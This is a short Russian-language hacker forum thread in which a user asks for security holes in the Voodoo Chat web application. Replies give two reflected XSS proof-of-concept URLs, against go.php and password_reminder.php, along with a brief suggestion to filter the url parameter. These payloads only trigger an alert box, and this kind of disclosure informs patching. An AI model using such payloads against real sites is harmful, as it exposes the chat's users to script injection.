FuckinG Voodoo Chat!!!!!!

Не могу его найти ни на лентах багтрака, ни кого ни спрашиваю - не знают... Сам просидел х*й знает сколько, копаясь в нём и выискивая хоть ЧаВо-НиБуДь.... но уж так за***лся, что.... кароче сил больше нет! Может у кого-нить есть какая-нить сек-инфа по нему? Буду оч благодарен.

Поищи, данная тема уже поднималась и не раз. На главной странице есть ПОИСК

Есть пассивная хсс:

Type:[XSS] Product: Voodoo chat Author:qBiN exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность с помощью сокетов. ------------------------------
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E

вот смотри ету тему:
http://forum.antichat.ru/thread11144.html

хых больное место )